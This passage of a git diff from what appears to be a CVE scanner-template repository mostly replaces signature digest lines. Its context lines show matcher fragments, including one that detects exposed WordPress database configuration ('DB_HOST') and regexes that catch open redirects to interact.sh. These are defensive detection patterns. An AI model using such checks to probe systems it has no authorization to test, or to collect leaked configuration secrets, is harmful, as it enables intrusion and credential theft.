4a0a0047304502210096fbefd79be923637f34a237dd95d633f7e1e74c9032024e1303095269e5f54d022056d644bf998c6da11f5cddeefd63cd48b65e7536f9c5cf39b706495941eba4a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220716e12214dbdee6365d2769db9b03c7eaa018cf4c26aa116c3c94e26ddcdd222022100be0eba9196b3fda90765c49757d936a3531c9737fed08f379e27f3b36c7d0462:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-2894.yaml b/http/cves/2018/CVE-2018-2894.yaml index 66281bf064..aba5e76e50 100644 --- a/http/cves/2018/CVE-2018-2894.yaml +++ b/http/cves/2018/CVE-2018-2894.yaml @@ -106,4 +106,4 @@ http: regex: - ([0-9]+){{randstr}} internal: true -# digest: 4b0a004830460221009a9dfdd4c197c7c4fc4ce6f158ec9894ce7a3b9bfc2c1ef97e6aaa4a4e0e799d022100dbb7c5a8718e01c302077fcd00797a90fb8604536d28cc3c355adf7269590934:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b83441e3166c0b0df2a8987853e3c5879b9c6085dcbb0cd6fc1adcb0a5a70138022100c1f01ed6dd9afe9b30f2ee90a24612dc75903fcd58176553091cec2c83e7a700:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-3167.yaml b/http/cves/2018/CVE-2018-3167.yaml index bd77c65d17..c1ff4055ec 100644 --- a/http/cves/2018/CVE-2018-3167.yaml +++ b/http/cves/2018/CVE-2018-3167.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203b5a861798bdaf310c79a99603903b8ed83143fc9868db8f34672e8d49edd92602210092223b9b93d18c686fbd2cf8ce05306dd736f5253ff970bffbde3a280894dbe8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e2243bdf0ff24133ea1ffd807103c979f9efdf7ec5963e6f15434034355b8cf5022071c7295b8292d28d5509b5c3d67bd6f3eeeecccf185dfdb06de47ab9e90c37f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-3238.yaml b/http/cves/2018/CVE-2018-3238.yaml index 8fe945a216..a0904bc7c6 100644 --- a/http/cves/2018/CVE-2018-3238.yaml +++ b/http/cves/2018/CVE-2018-3238.yaml @@ -55,4 +55,4 @@ http: - '' - 'Variables.cs_imagedir' condition: and -# digest: 4a0a00473045022013a622a0be9811b7d0ecdc8066a260e6803c6a08dacb80434f4d33ada5ea7b720221008f364d396fe6a4affacdbfa5cbf828b6d1aae0e5d8fbaebbdc16a8417ff8915e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220519311794181f4103c777c46b8ec38f32a52b8d58fd08ec5c41e24b873de75b4022017edf115e38b468d4ffb211426b442ff23610c659a974b6c0aa532fdee5ecf76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-5230.yaml b/http/cves/2018/CVE-2018-5230.yaml index 40b848310b..938d71b76f 100644 --- a/http/cves/2018/CVE-2018-5230.yaml +++ b/http/cves/2018/CVE-2018-5230.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b138fbd3bbd489f08bd33858718f0442f6505a373448138b9dcab407fc9c6f0d02200ef70b95e53275733e292c2ca0ea7e64bd6524a631001790a986ac2e9c23ef93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e292b775f495cee76f716227f5dd4f8303296744b5ddfd30df10db6e346985290220043f44579862f82d6d7e74fc6bb683fd81c202cc7d66fcc96793e875d1ab8cea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-5233.yaml b/http/cves/2018/CVE-2018-5233.yaml index 117df9b4f3..0394c5bda9 100644 --- a/http/cves/2018/CVE-2018-5233.yaml +++ b/http/cves/2018/CVE-2018-5233.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ac12beeb0765408098385cec10cfe7119f4fe1c654855fcde0ce13620853190f02202639f2f594675cb8c6f82c9bd44043fd33e85be4ecaed774de7983a7e86955fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205d94c87049351a7f101fba0ce3581719bf527bb968cce242462e921bafa0078f02200bc9faa1036e72caf538f0ddb1b87af9dab5610c4bb1656fa71d9e41048c03f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-5715.yaml b/http/cves/2018/CVE-2018-5715.yaml index b0003b1f1d..42d6e8e136 100644 --- a/http/cves/2018/CVE-2018-5715.yaml +++ b/http/cves/2018/CVE-2018-5715.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008c05e33006dbd780fae660e050aed278fd7987296118a56c8d9a0638a8e7ef7602207002a6abd15e8a9725e7831f8da20415beeb6ea650ca5ef0d4fea381f31669a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205cbe5bc8927aa551dacb48b3bd778916c3a1b69cfebc4f4b803cb99ca8c670160220709e158072a722d8ff00a439bbf24f831dcd951d065ae4962d2ee56ceb893da9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-6008.yaml b/http/cves/2018/CVE-2018-6008.yaml index e4e740a06e..7938f8680a 100644 --- a/http/cves/2018/CVE-2018-6008.yaml +++ b/http/cves/2018/CVE-2018-6008.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220366ea8f6eabe8f7fe1d1af4ce9b6fdd86c53702b2427ffaaa91fdeb6c139c77402210086e4d831ecc7b1f17817a499555c0a272319b49cdb3789ee5a671751f3aaf3d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203fb92c4f132a4c77e2a6d30db6a1542220ceb34cc491834093e91897ef2900b002200b2abc6e1eff9c1d819081c3d6e143d471641d33399dcae94ea1d557b3f4a9c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-6184.yaml b/http/cves/2018/CVE-2018-6184.yaml index 9d3b618e4b..ceddc694fa 100644 --- a/http/cves/2018/CVE-2018-6184.yaml +++ b/http/cves/2018/CVE-2018-6184.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022046ed6ab052aa19638a0ffc3dcbee16692a234b44a030f4b38d7b47aa8d9451c8022100f4af3e59fc9802e8697ff78159b0c24ed36a4c06abd1f7d3fe55618b7945eb56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fcf47f518b5c8a2c231867c828cddd000f1cc983e51583f84e7c24dfc925445a022100d09a0b84827184d7a8da4a412b6937c6436e1b9b4ace03f2af2130806f6baa11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-6200.yaml b/http/cves/2018/CVE-2018-6200.yaml index dcaba6686e..e491283770 100644 --- a/http/cves/2018/CVE-2018-6200.yaml +++ b/http/cves/2018/CVE-2018-6200.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f4a971fd11c1a927c6e873c51427acdcd586d9c2448cabe3510e615451cc809d0221008b30ac4f0c3254be852c1b557d4d975cdb12e938e9d8f75acfb27c6557b5266a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205ec5427f7148858468b07f9d9752089db2bd5c548e72827ce9456cfce69fe860022018534fbeffb2b41e4f76779db2f06ae1771689e3a9fc8a2e6c892de2fb687be4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-6910.yaml b/http/cves/2018/CVE-2018-6910.yaml index 8ba372490a..8cfdc5acb1 100644 --- a/http/cves/2018/CVE-2018-6910.yaml +++ b/http/cves/2018/CVE-2018-6910.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220122cea15066daaf440abc612242447e22e46d4e4efd9e40c5694fd5e0a1e9a27022100b98f2037d4800d9ea956fe9b5112e967c1493ffebb1b7c072c7c96a4c8309673:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220057eae85c0699ecc345f4158ec61b98fb01dbe82f6b264cee2a711b22c1b3b28022100a931745c97d34d3e518456589ca9cdd2f2d1c4d4920d8748cecdba748eec1d70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7251.yaml b/http/cves/2018/CVE-2018-7251.yaml index 38ef7d5c37..69d0d38bd5 100644 --- a/http/cves/2018/CVE-2018-7251.yaml +++ b/http/cves/2018/CVE-2018-7251.yaml @@ -42,4 +42,4 @@ http: - '"message":' - '"trace":[' condition: and -# digest: 4a0a00473045022058d8c40d9e7df2e5d4b15882827256af64c97188dd2c24cbc0d0dc4c5d0f9e710221009869b1fb16948e81ec247976f03a6b5cbfc308f3525ff89b85f799154ddab604:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c3cacb61106a5b9d82fd0811be6d79b187ae1aaec468bba807985596f77f33f502204bcaec65aa83143087b15a608470e714185f27e09db3881db95feb28f050b704:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7282.yaml b/http/cves/2018/CVE-2018-7282.yaml index 80f34c24ca..ea5dbc252f 100644 --- a/http/cves/2018/CVE-2018-7282.yaml +++ b/http/cves/2018/CVE-2018-7282.yaml @@ -52,4 +52,4 @@ http: - 'status_code == 200' - 'contains(body, "PrintMonitor") && contains(header, "text/html")' condition: and -# digest: 4b0a00483046022100943388e630f780887fc461ebd2b12bde74a8292ae62fade14d472388d6320299022100e0ef9ae2497c7b48c98c934d40e7a921b8c47516acc6bbcbb11c401c2c34ff5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220207da10f0dc507b4fe74ff6e86ff0f5f8ed80271153998a385043d4d7dd6fffe022023ef15c2a79389d9f4f724a90dd9102aae5e3457652f1ee51d7b229dfc072f85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7467.yaml b/http/cves/2018/CVE-2018-7467.yaml index 93bad7a63c..c9101e2e91 100644 --- a/http/cves/2018/CVE-2018-7467.yaml +++ b/http/cves/2018/CVE-2018-7467.yaml @@ -44,4 +44,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 4a0a004730450220730596c3b65f6bdb1c012bfa332c6bcfa973e2cedf141af5fc48871182c27c67022100c3f14b8377a6fb6afe484202a9ca1e0209357ef0b47a569e5c5c3e3217be0d48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220595472e5219c255041d68beff4e28f8d16b5f7b56454fc40802348439e85c6a7022100c9f265886bcf394f98ef35ea532cb1743084d4d6f8a20cf57812f11efca4ac4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7600.yaml b/http/cves/2018/CVE-2018-7600.yaml index 502607e70a..300f5b46da 100644 --- a/http/cves/2018/CVE-2018-7600.yaml +++ b/http/cves/2018/CVE-2018-7600.yaml @@ -74,4 +74,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202c09433a57c6712e699f69726c3d55bcae576db5d958bd870a26658faa84eee5022100e52e719b9b5648e1c146e206730d0123767549dfc51d8d2b29b58117fe595a4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201914043df006e7871b073873357dcae4f895b022765c4548f30bd37913a42a90022100e87df0cac8b1777590d54b0a2e6c0da7893c61bac369032cfbc03ad74e2d287b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7602.yaml b/http/cves/2018/CVE-2018-7602.yaml index 9c7e4cd6ad..fdc40e94e4 100644 --- a/http/cves/2018/CVE-2018-7602.yaml +++ b/http/cves/2018/CVE-2018-7602.yaml @@ -84,4 +84,4 @@ http: - '' internal: true part: body -# digest: 4a0a0047304502204dec12f369a9044e8dc3ba9c641723199442f60a3736e83f89caca37cd8118b5022100cda38fa6e52e8717c3073dff9123fc3707428e477982dd4549e372892f2a082e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202d2710f951db7f42ffbe35520feccb277f78e22dc8f10c354f2aa29edb7120e3022100da118a7c6946b7da9ed54ff1617399618c8a3fdce400375c4fe24cdd0c1838bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7653.yaml b/http/cves/2018/CVE-2018-7653.yaml index d347ae0ded..4304af2aef 100644 --- a/http/cves/2018/CVE-2018-7653.yaml +++ b/http/cves/2018/CVE-2018-7653.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200df73aa8ff0971cc80f47dd8d46f775cca36832a7ffa4d6c951b8503a4f9bf9f022100cf13ce4a2d6aaa51a72fc212a1d7dcd21c694f26d8614f626aeb56b566e7ed0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220349646e629207f53dbcbac604439948f3417458e17708a75dc87c564d7dbbed20220177685393f75d3aba7c78cfb11674efa564bea05aae092ab681716d96cdde44e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7662.yaml b/http/cves/2018/CVE-2018-7662.yaml index 1a19f074f3..d88b57a069 100644 --- a/http/cves/2018/CVE-2018-7662.yaml +++ b/http/cves/2018/CVE-2018-7662.yaml @@ -52,4 +52,4 @@ http: - "phpmailer.php on line 10" - "Fatal error: Call to a menber function add_event_listener() on a non-object in" condition: and -# digest: 490a0046304402207bc6bc4a86c8bf73bc4bc1fe83c3fb63108f1b1b77ac110b33a6af75a7a3a8ad02203036732893f9ba2208c741cd3a825d7d73f9870d11029f0c14d7098e0bc302cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c4460a818f60b488fc5c71aa9168516c7a2150f2545f52f51d1e70070b99845902207d25ed1c7daae64770f71a5d953448464b14770c12736d4eda9a5a7873141812:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7700.yaml b/http/cves/2018/CVE-2018-7700.yaml index ea0c5bd4f4..4108c5e25d 100644 --- a/http/cves/2018/CVE-2018-7700.yaml +++ b/http/cves/2018/CVE-2018-7700.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cdf514174881ec0aeaef7de181633cd9ae46dce268ed4262a00bc975b91084ad022100f1ab77a5571ee8bd0bdc0fbb0c8576f35706d726fd32db02369c00b362f8d857:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022004b883c8d19126ea1e29ef6a041ed23d893f36fc247f060356afa9e020f8acb8022100dd9ef2efefad420bbff52b8f3708925755b7fae6153ed9a43c26c795c5d76adc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-8006.yaml b/http/cves/2018/CVE-2018-8006.yaml index 3dcd0ed56b..7c5ec277eb 100644 --- a/http/cves/2018/CVE-2018-8006.yaml +++ b/http/cves/2018/CVE-2018-8006.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200a0e6c89a7590f00b6b41f9c95276a493388e0d368986093d4f4a822895cd02a022100d5dfb7f525b41f7a51693c55344937d5db68f783b820ac4efc30ccbe6235bf76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022010f10cc4688e28353a393c312e28aeef7a9ad41a7cf07e6a10812e8f60eb4066022100d5392973491ba3d359ac52e1e3ca8e4e61c1dee7a80e84be49b71416ed17e8a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-8033.yaml b/http/cves/2018/CVE-2018-8033.yaml index 851c9e01e0..966921ddf1 100644 --- a/http/cves/2018/CVE-2018-8033.yaml +++ b/http/cves/2018/CVE-2018-8033.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210082dab42d8df11cef427da8f19b687fc19ea3514fcc689610b9f0ab8a7f82c97e022100a8053d51f59aae056907324176a4898da614bd38c1fa07ebbd608b924a1baf56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206ecea4e629ad9e17c58a766f9588495d12fcf7ddbc84d3fa34fd478c83258814022100f71e483743b5475d9c6cfb08a5c136c79e2487c7328ac1d395c9aca893266fad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-8715.yaml b/http/cves/2018/CVE-2018-8715.yaml index c2250d7fb5..074d7c15f3 100644 --- a/http/cves/2018/CVE-2018-8715.yaml +++ b/http/cves/2018/CVE-2018-8715.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022005d455efc5652978e6ce03467a2fdc9063fa8b000a45eafb0302fc5d0bd2237902205f0c0f61bf8b26e05992a876e05e7b5191f3ca30dc15e835eb036d08ee54b69d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bd663b7b04de0ea4a75d80e8408f1c23c06cd76abfcc8ee02a4a88cbb5fbc1bb02210087cb7563d692efc05acb93bf5ba46ba22a41a4493c29430d79e08c9dce089128:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-8719.yaml b/http/cves/2018/CVE-2018-8719.yaml index 17e6c6f48a..77877699e9 100644 --- a/http/cves/2018/CVE-2018-8719.yaml +++ b/http/cves/2018/CVE-2018-8719.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200bfe6f271147b79d93d598268d4cffdb5892583d30dbcada1cad9f7e1a973909022100ff263587c52e3feb5e26514030f4ca8dc8913cc3a31be0a13a140142eeda44c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cff403ec1d7c36ecd087e8a3ba798a05ec77bfa1764aa2b89e571033cee6695302203bf9a256c6c4dec931e05a4c519c00c937217f97ab2aeccbf09f12ec9344c59a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-8823.yaml b/http/cves/2018/CVE-2018-8823.yaml index 031c8b8b47..342b8ce4f8 100644 --- a/http/cves/2018/CVE-2018-8823.yaml +++ b/http/cves/2018/CVE-2018-8823.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b0293837a55f3a251897629158fe5d2fc0baabc8824ac948a8ecd7fbbe466b940220586a05c494ae966678dbafb3551788c080d1e7048f1b2956ee027fb4b9f9549c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210089a37a72b700ed30f6f4af4d738ea62aec25bbd5d92c9e5d298a3f82136a3e87022100a985aafcb505a8df88d1070cdc302c358244facdf48a006b3b1c0b253e3c2da2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-9118.yaml b/http/cves/2018/CVE-2018-9118.yaml index e598e0a524..1ce0f465fa 100644 --- a/http/cves/2018/CVE-2018-9118.yaml +++ b/http/cves/2018/CVE-2018-9118.yaml @@ -46,4 +46,4 @@ http: - "DB_HOST" - "The base configurations of the WordPress" condition: and -# digest: 4b0a00483046022100d6d3b6187f774e9c2146fd3b53f488bcac19a3f11bcba527c546f24479ab6057022100a42013e5cd5cb9001d5e8f6a8d82fd0296023000fcba05bc258bbdd09c0e29bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220015beb169f06bde24fa211fe065c528759c245a5978b7aab3ecf489647f6b127022100b7604378240ccca7a0d322d620e27549216b34324349d21da959b1bd303f92e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-9205.yaml b/http/cves/2018/CVE-2018-9205.yaml index 250b3b302f..178a79cf49 100644 --- a/http/cves/2018/CVE-2018-9205.yaml +++ b/http/cves/2018/CVE-2018-9205.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d98eaf7bdbf1caeef48de5f5a88053a8dd8b7f572cf99ebc17107d3947319137022100e3cd28b30507fa2595935375a05b182a0d677afceeabff1809f5d6f940487ab0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022015c6fc8c65e4fa4c70222b3c525ce111e879f4bd4c3cf44448d4f92fa66068d00220358421623f4cfbc1779acbc2ecddbe2ea1174b321df7ce8130aae2fdc107b9ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-0193.yaml b/http/cves/2019/CVE-2019-0193.yaml index 4b9aea984e..83b03912fd 100644 --- a/http/cves/2019/CVE-2019-0193.yaml +++ b/http/cves/2019/CVE-2019-0193.yaml @@ -67,4 +67,4 @@ http: regex: - '"name"\:"(.*?)"' internal: true -# digest: 4a0a00473045022100812bfeee2c8b417abe9a230dec3d7580ed762ca6e526dde72faf88c49062dad1022016ceded74fa64abfcf6b52aadca41a3a82ff453e7823b6b89ba3531cd4030a63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205bcaabde2cb2ce6143465b21d835940f816432250b2f34f593fe713de3f37b6302206c592f558533678f62e8169a0e959bf0717a04b8dbcae72f18caf6ec18da9c9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-0221.yaml b/http/cves/2019/CVE-2019-0221.yaml index c102db69ea..4e292cc145 100644 --- a/http/cves/2019/CVE-2019-0221.yaml +++ b/http/cves/2019/CVE-2019-0221.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220338012c936f08bbf4397c9221d081cc7cdc2ccff4bea3fe855723ec3f90e0c020221009f9036c094abfbc759d859cfccbdc9d221f992816c2ad27d461c6264bd74f09e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009b5e693d9c11510046258658cf64d0bed4e7e351d300cec6fc9c91b15a218950022072ace8ff86b9cfd8ffea3c1d9bdf57b096a78bd39c40d02f3b238f80500964ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-0230.yaml b/http/cves/2019/CVE-2019-0230.yaml index c652f6af37..4070e89092 100644 --- a/http/cves/2019/CVE-2019-0230.yaml +++ b/http/cves/2019/CVE-2019-0230.yaml @@ -44,4 +44,4 @@ http: part: body words: - "{{str}}16384" -# digest: 4a0a00473045022100dc3f9eb4ddc3ee9f4358b97c25b2e19f64754b2a6ab4e908f3cd5e6b3abe856902201c8b19054aa21ce2de57af88dcef93933f942b8b7a61bb0d878cf24a39a7353c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204bf4ab1a8374aeb43f677f37418bc1bd76186cc51614ed4823ee79b554de1622022013657af873e57d6a8cbdb6772fab359e1d83cfa3adcd3cd4b291a06dde328ba2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10068.yaml b/http/cves/2019/CVE-2019-10068.yaml index 450d51d916..4c0317495b 100644 --- a/http/cves/2019/CVE-2019-10068.yaml +++ b/http/cves/2019/CVE-2019-10068.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100a7dcdd6513c019b521381c8555d14a10f5e9a723507439a20ff452fc1feb73fe022100f1d272fcdc74b59eddcf782b5c40bbfb75f55fdd2b97dd823c3dd3820646d82d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fb255020353bac7f6f491e89641dff7f941be863f5658d7bc1968ef8fb54ecfd022100f45638cb71429977b943ddd9dd3a9a5cdaa86becae79b42f3f43266dea8aeabd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10092.yaml b/http/cves/2019/CVE-2019-10092.yaml index 20f33b0bd3..5e0400ae6b 100644 --- a/http/cves/2019/CVE-2019-10092.yaml +++ b/http/cves/2019/CVE-2019-10092.yaml @@ -39,4 +39,4 @@ http: - type: word words: - "" -# digest: 4b0a00483046022100cf7b74757369fdca2726f4be8043d410911a61a6ff57c674a2fdea6db7e5ff72022100b31692e88e01fa8ac9c6e6ade337723ae79cab3ee421101a31b483f51497a1b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fe06ef219910cb21377ede6e43897e9d1ba840a59568b50da8ada8b648d780d4022100d5d67b48a8bfbc03e42ed70988267121fe056df8f26288784a7bef6bb0a65f52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10098.yaml b/http/cves/2019/CVE-2019-10098.yaml index 1cf3fb43e7..2e00f421b2 100644 --- a/http/cves/2019/CVE-2019-10098.yaml +++ b/http/cves/2019/CVE-2019-10098.yaml @@ -42,4 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 490a0046304402206d5acc648046711517cfb9e2cf0cdb4c15233662233ff46aef2ea399f5a42f3b02204bbcd1901f2966465782ae4bb1a89811265aa66156c599bfd42c96706453fa92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e01b48fe0207c14f780bac9919a035df55337e8ca43bba6da5a3d18cd046698202201f46c8762e584f6deab72e836d638c31eb0c298c93ba3e5f0f0e2d6121f8bb75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-1010290.yaml b/http/cves/2019/CVE-2019-1010290.yaml index 7df027d093..480d8f8958 100644 --- a/http/cves/2019/CVE-2019-1010290.yaml +++ b/http/cves/2019/CVE-2019-1010290.yaml @@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022100b71c92a9f51a31a95aa5feb9fbd9abdd3e07ddd18f08fc48e5de15cacded85a8022022154cf34629f7d798927258f4c611a5395a1f7bb5970e12b034e5c20f269684:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220627139c3cb938a7d7eba04d718744e16fd6aafe8a2a1cf44653c9ddaac1261ab022100e582c6f7eac458309456c6516ef964bfe5f5322d43dcacd800d796a08b68de83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10405.yaml b/http/cves/2019/CVE-2019-10405.yaml index 4a739d8006..c3d9302ed4 100644 --- a/http/cves/2019/CVE-2019-10405.yaml +++ b/http/cves/2019/CVE-2019-10405.yaml @@ -64,4 +64,4 @@ http: - type: kval kval: - x_jenkins -# digest: 4a0a00473045022100d3c00480594e335316512607e1730e0f4b99e755cd744fc506c049036dbe4696022000afd5caaf07abf1dbe8d051503772a11975ed7d5bd15940e71c63a569ad63bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f4be7b8a859751b37e854ba92cbebfa38e7ab814389f5b2dd24df7697b7c16e4022100d799b43c6d6ff75cf10ee409dbf6d93a8c3fa0093abebb378d2517eaffc1ee38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10475.yaml b/http/cves/2019/CVE-2019-10475.yaml index e665e9a158..e1c4c774d4 100644 --- a/http/cves/2019/CVE-2019-10475.yaml +++ b/http/cves/2019/CVE-2019-10475.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dc94a63bb9257fa228726bcf29cfbe0a229e465f764ac1171e35d57315a944a0022100beb7f2b019f71c9fd84a9f74a5d739377d1e70541ae889c8f961a6aea511ad68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200729f4979c6f6a749656ff66f3a90159ab17e28e5e9f1a518922efedb2b9f2cd022078c9ac664f0bf3ac9ab19dba77d87c09cd81caad0f19fd1a9148232c74aaf571:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10692.yaml b/http/cves/2019/CVE-2019-10692.yaml index ef67bb90de..bcd21ce3cf 100644 --- a/http/cves/2019/CVE-2019-10692.yaml +++ b/http/cves/2019/CVE-2019-10692.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c806b890a97e99051ab9b8870e02ada13436f59da4752594ce9b67a1128d22d40220703e18d56fabf954d54d723644533979ffb22a19e26d64263430140e7f069c9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c30b059669a67c82b43bde48f994bfc70f0442104ff816480cde0dbd3d486f6e02205020c6d8f3218d83eafe8bbd2f06bd6a7326e45413d38d70a695cf805d7feba2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10717.yaml b/http/cves/2019/CVE-2019-10717.yaml index e65cb1cb15..5911a3c978 100644 --- a/http/cves/2019/CVE-2019-10717.yaml +++ b/http/cves/2019/CVE-2019-10717.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# 